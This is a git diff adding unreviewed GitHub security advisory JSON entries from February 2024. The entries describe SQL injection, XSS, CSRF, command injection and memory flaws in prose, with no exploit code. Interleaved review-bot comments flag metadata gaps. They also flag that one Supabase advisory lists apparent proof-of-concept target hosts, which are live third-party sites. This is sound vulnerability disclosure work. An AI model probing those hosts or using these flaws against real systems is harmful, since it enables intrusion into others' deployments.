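Review bot: GHSA-vjv2-8c96-r6jw records a rejected CVE ("We have rejected this CVE as it was determined a non-security issue by the vendor") but is otherwise indistinguishable from a live advisory: no `withdrawn` timestamp, `severity` empty, `cwe_ids` empty. The OSV schema this file declares (`1.4.0`) provides a top-level `"withdrawn": "<RFC3339 timestamp>"` field for exactly this case; if the database uses it for other rejected entries, setting it here would let consumers exclude the advisory without parsing the free-text `details`.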
diff --git a/advisories/unreviewed/2024/02/GHSA-vm59-55f6-4qp9/GHSA-vm59-55f6-4qp9.json b/advisories/unreviewed/2024/02/GHSA-vm59-55f6-4qp9/GHSA-vm59-55f6-4qp9.json new file mode 100644 index 0000000000000..c04a4f7df1d6c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vm59-55f6-4qp9/GHSA-vm59-55f6-4qp9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm59-55f6-4qp9", + "modified": "2024-02-05T18:31:37Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2023-6874" + ], + "details": "Prior to v7.4.0, Ember ZNet is vulnerable to a denial of service attack through manipulation of the NWK sequence number", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6874" + }, + { + "type": "WEB", + "url": "https://community.silabs.com/069Vm000000WXaOIAW" + }, + { + "type": "WEB", + "url": "https://github.com/SiliconLabs/gecko_sdk" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-754" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vmmp-h76c-g65f/GHSA-vmmp-h76c-g65f.json b/advisories/unreviewed/2024/02/GHSA-vmmp-h76c-g65f/GHSA-vmmp-h76c-g65f.json new file mode 100644 index 0000000000000..0e99da60baada --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vmmp-h76c-g65f/GHSA-vmmp-h76c-g65f.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmmp-h76c-g65f", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-42664" + ], + "details": "A post authentication command injection vulnerability exists when setting up the PPTP global configuration of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42664" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1856" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vq84-wx4w-6r76/GHSA-vq84-wx4w-6r76.json b/advisories/unreviewed/2024/02/GHSA-vq84-wx4w-6r76/GHSA-vq84-wx4w-6r76.json new file mode 100644 index 0000000000000..6e458d580c8f3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vq84-wx4w-6r76/GHSA-vq84-wx4w-6r76.json 
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vq84-wx4w-6r76", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2024-24213" + ], + "details": "Supabase PostgreSQL v15.1 was discovered to contain a SQL injection vulnerability via the component /pg_meta/default/query.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24213" + }, + { + "type": "WEB", + "url": "https://app.flows.sh:8443/project/default%2C" + }, + { + "type": "WEB", + "url": "https://github.com/940198871/Vulnerability-details/blob/main/CVE-2024-24213" + }, + { + "type": "WEB", + "url": "https://postfixadmin.ballardini.com.ar:8443/project/default/logs/explorer." + }, + { + "type": "WEB", + "url": "https://reference1.example.com/project/default/logs/explorer%2C" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vqrv-v5q9-26w8/GHSA-vqrv-v5q9-26w8.json b/advisories/unreviewed/2024/02/GHSA-vqrv-v5q9-26w8/GHSA-vqrv-v5q9-26w8.json new file mode 100644 index 0000000000000..56443e3fbdc6e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vqrv-v5q9-26w8/GHSA-vqrv-v5q9-26w8.json 
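Review bot: Three of the five references in GHSA-vq84-wx4w-6r76 are not references at all: `https://app.flows.sh:8443/project/default%2C`, `https://postfixadmin.ballardini.com.ar:8443/project/default/logs/explorer.` and `https://reference1.example.com/project/default/logs/explorer%2C` look like proof-of-concept target hosts (one is the reserved `example.com` placeholder) with trailing `%2C`/`.` punctuation that was swept into the URL list. Publishing them points readers and scanners at third-party deployments that have nothing to do with the fix, so they should be dropped, leaving the NVD entry and the researcher's write-up. The entry also has no CWE and no score; `"cwe_ids": ["CWE-89"]` follows directly from the description.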
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqrv-v5q9-26w8", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20010" + ], + "details": "In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358560; Issue ID: ALPS08358560.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20010" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json b/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json new file mode 100644 index 0000000000000..03badb7ab3913 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrhp-w2wh-93c3", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24258" + ], + "details": "mupdf v1.23.9 was discovered to contain a memory leak via the menuEntry variable in the glutAddSubMenu function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24258" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/mupdf_defects/blob/main/mupdf_detect_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-401" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vrq4-9579-qc8m/GHSA-vrq4-9579-qc8m.json b/advisories/unreviewed/2024/02/GHSA-vrq4-9579-qc8m/GHSA-vrq4-9579-qc8m.json new file mode 100644 index 0000000000000..53051f2abeed7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vrq4-9579-qc8m/GHSA-vrq4-9579-qc8m.json 
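Review bot: The HIGH severity and `AV:N ... A:H` vector in GHSA-vrhp-w2wh-93c3 sit uneasily with the `details` text, which describes a memory leak of the `menuEntry` variable in `glutAddSubMenu`, a GLUT menu-construction routine in the viewer front end. Nothing in the description suggests network reachability or an attacker-controlled trigger, so the network vector looks inherited from a template rather than derived from the bug; the linked write-up should be checked before this is treated as a network-exploitable HIGH. If the upstream scoring cannot be substantiated, the entry is better left with an empty `severity` than a misleading one.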
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrq4-9579-qc8m", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-24029" + ], + "details": "JFinalCMS 5.0.0 is vulnerable to SQL injection via /admin/content/data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24029" + }, + { + "type": "WEB", + "url": "https://gitee.com/heyewei/JFinalcms/issues/I8VE52" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vrq8-9hj2-pm43/GHSA-vrq8-9hj2-pm43.json b/advisories/unreviewed/2024/02/GHSA-vrq8-9hj2-pm43/GHSA-vrq8-9hj2-pm43.json new file mode 100644 index 0000000000000..6d1a722790d2f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vrq8-9hj2-pm43/GHSA-vrq8-9hj2-pm43.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrq8-9hj2-pm43", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-1265" + ], + "details": "A vulnerability classified as problematic has been found in CodeAstro University Management System 1.0. Affected is an unknown function of the file /att_add.php of the component Attendance Management. The manipulation of the argument Student Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253008.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1265" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1AnzEcwDC0AP56i65zCqekFAeYQY6skBH/view?usp=sharing" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253008" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253008" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vv93-j256-hpwh/GHSA-vv93-j256-hpwh.json b/advisories/unreviewed/2024/02/GHSA-vv93-j256-hpwh/GHSA-vv93-j256-hpwh.json new file mode 100644 index 0000000000000..efd983fd94fc8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vv93-j256-hpwh/GHSA-vv93-j256-hpwh.json 
@@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vv93-j256-hpwh", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2023-6232" + ], + "details": "Buffer overflow in the Address Book username process in authentication of Mobile Device Function of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6232" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2024/02/GHSA-vwj5-26vq-wvx2/GHSA-vwj5-26vq-wvx2.json b/advisories/unreviewed/2024/02/GHSA-vwj5-26vq-wvx2/GHSA-vwj5-26vq-wvx2.json new file mode 100644 index 0000000000000..f2240655719df --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vwj5-26vq-wvx2/GHSA-vwj5-26vq-wvx2.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwj5-26vq-wvx2", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0371" + ], + "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'create_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0371" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vx2f-5c28-4wg3/GHSA-vx2f-5c28-4wg3.json b/advisories/unreviewed/2024/02/GHSA-vx2f-5c28-4wg3/GHSA-vx2f-5c28-4wg3.json new file mode 100644 index 0000000000000..9953dbc3cdc4e --- /dev/null 
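Review bot: GHSA-vwj5-26vq-wvx2 describes "a missing capability check on the 'create_view' function" but records no CWE; `"cwe_ids": ["CWE-862"]` (Missing Authorization) is the standard classification for a missing capability check and would make the entry consistent with the CWE-tagged entries around it. The changeset reference correctly spans tags `3.2.2` to `3.2.3`, which is also the fixed version implied by "up to, and including, 3.2.2", so that range is worth stating in `details` or `affected` once the package is mapped.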
+++ b/advisories/unreviewed/2024/02/GHSA-vx2f-5c28-4wg3/GHSA-vx2f-5c28-4wg3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vx2f-5c28-4wg3", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-24061" + ], + "details": "springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sysContent/add.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24061" + }, + { + "type": "WEB", + "url": "https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#13-stored-cross-site-scripting-syscontentadd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T14:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w4qh-vg3x-929v/GHSA-w4qh-vg3x-929v.json b/advisories/unreviewed/2024/02/GHSA-w4qh-vg3x-929v/GHSA-w4qh-vg3x-929v.json new file mode 100644 index 0000000000000..1430345e85d29 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w4qh-vg3x-929v/GHSA-w4qh-vg3x-929v.json 
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w4qh-vg3x-929v",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-45025"
+ ],
+ "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQTS 4.5.4.2627 build 20231225 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTS hero h4.5.4.2626 build 20231225 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45025"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-47"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-w4r6-2p3v-r8w8/GHSA-w4r6-2p3v-r8w8.json b/advisories/unreviewed/2024/02/GHSA-w4r6-2p3v-r8w8/GHSA-w4r6-2p3v-r8w8.json
new file mode 100644
index 0000000000000..463c0c847bf8d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-w4r6-2p3v-r8w8/GHSA-w4r6-2p3v-r8w8.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w4r6-2p3v-r8w8",
+ "modified": "2024-02-05T06:30:31Z",
+ "published": "2024-02-05T06:30:31Z",
+ "aliases": [
+ "CVE-2024-20012"
+ ],
+ "details": "In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358566; Issue ID: ALPS08358566.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20012"
+ },
+ {
+ "type": "WEB",
+ "url": "https://corp.mediatek.com/product-security-bulletin/February-2024"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-w57g-4hpj-6p36/GHSA-w57g-4hpj-6p36.json b/advisories/unreviewed/2024/02/GHSA-w57g-4hpj-6p36/GHSA-w57g-4hpj-6p36.json
new file mode 100644
index 0000000000000..2471f4a18a068
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-w57g-4hpj-6p36/GHSA-w57g-4hpj-6p36.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w57g-4hpj-6p36",
+ "modified": "2024-02-02T15:30:28Z",
+ "published": "2024-02-02T15:30:28Z",
+ "aliases": [
+ "CVE-2023-6676"
+ ],
+ "details": "Cross-Site Request Forgery (CSRF) vulnerability in National Keep Cyber Security Services CyberMath allows Cross Site Request Forgery.This issue affects CyberMath: from v1.4 before v1.5.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6676"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-24-0080"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T13:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-w636-mh7p-cc94/GHSA-w636-mh7p-cc94.json b/advisories/unreviewed/2024/02/GHSA-w636-mh7p-cc94/GHSA-w636-mh7p-cc94.json
new file mode 100644
index 0000000000000..1e10f537d88ce
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-w636-mh7p-cc94/GHSA-w636-mh7p-cc94.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w636-mh7p-cc94",
+ "modified": "2024-02-02T18:30:30Z",
+ "published": "2024-02-02T00:31:28Z",
+ "aliases": [
+ "CVE-2024-23034"
+ ],
+ "details": "Cross Site Scripting vulnerability in the input parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23034"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/weng-xianhu/eyoucms/issues/57"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T23:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-w65c-vwf8-cxjv/GHSA-w65c-vwf8-cxjv.json b/advisories/unreviewed/2024/02/GHSA-w65c-vwf8-cxjv/GHSA-w65c-vwf8-cxjv.json
new file mode 100644
index 0000000000000..8a71633ab67fb
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-w65c-vwf8-cxjv/GHSA-w65c-vwf8-cxjv.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w65c-vwf8-cxjv",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-07T18:30:27Z",
+ "aliases": [
+ "CVE-2024-20254"
+ ],
+ "details": "Multiple vulnerabilities in Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks that perform arbitrary actions on an affected device. \n\n Note: \"Cisco Expressway Series\" refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.\n\n For more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20254"
+ },
+ {
+ "type": "WEB",
+ "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-w6f5-cfrr-rg5r/GHSA-w6f5-cfrr-rg5r.json b/advisories/unreviewed/2024/02/GHSA-w6f5-cfrr-rg5r/GHSA-w6f5-cfrr-rg5r.json
new file mode 100644
index 0000000000000..48c25ae9720d8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-w6f5-cfrr-rg5r/GHSA-w6f5-cfrr-rg5r.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w6f5-cfrr-rg5r",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24838"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Five Star Plugins Five Star Restaurant Reviews allows Stored XSS.This issue affects Five Star Restaurant Reviews: from n/a through 2.3.5.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24838"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/good-reviews-wp/wordpress-five-star-restaurant-reviews-plugin-2-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T07:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-w6j5-fp4m-crpf/GHSA-w6j5-fp4m-crpf.json b/advisories/unreviewed/2024/02/GHSA-w6j5-fp4m-crpf/GHSA-w6j5-fp4m-crpf.json
new file mode 100644
index 0000000000000..f895f09cf578f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-w6j5-fp4m-crpf/GHSA-w6j5-fp4m-crpf.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w6j5-fp4m-crpf",
+ "modified": "2024-02-06T15:32:08Z",
+ "published": "2024-02-06T15:32:08Z",
+ "aliases": [
+ "CVE-2024-24593"
+ ],
+ "details": "A cross-site request forgery (CSRF) vulnerability in all versions of the api and web server components of Allegro AI’s ClearML platform allows a remote attacker to impersonate a user by sending API requests via maliciously crafted html. Exploitation of the vulnerability allows an attacker to compromise confidential workspaces and files, leak sensitive information, and target instances of the ClearML platform within closed off networks.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24593"
+ },
+ {
+ "type": "WEB",
+ "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-w759-3hj5-qw74/GHSA-w759-3hj5-qw74.json b/advisories/unreviewed/2024/02/GHSA-w759-3hj5-qw74/GHSA-w759-3hj5-qw74.json
new file mode 100644
index 0000000000000..48d3115186135
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-w759-3hj5-qw74/GHSA-w759-3hj5-qw74.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w759-3hj5-qw74",
+ "modified": "2024-02-05T06:30:31Z",
+ "published": "2024-02-05T06:30:31Z",
+ "aliases": [
+ "CVE-2024-20013"
+ ],
+ "details": "In keyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08471742; Issue ID: ALPS08308608.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20013"
+ },
+ {
+ "type": "WEB",
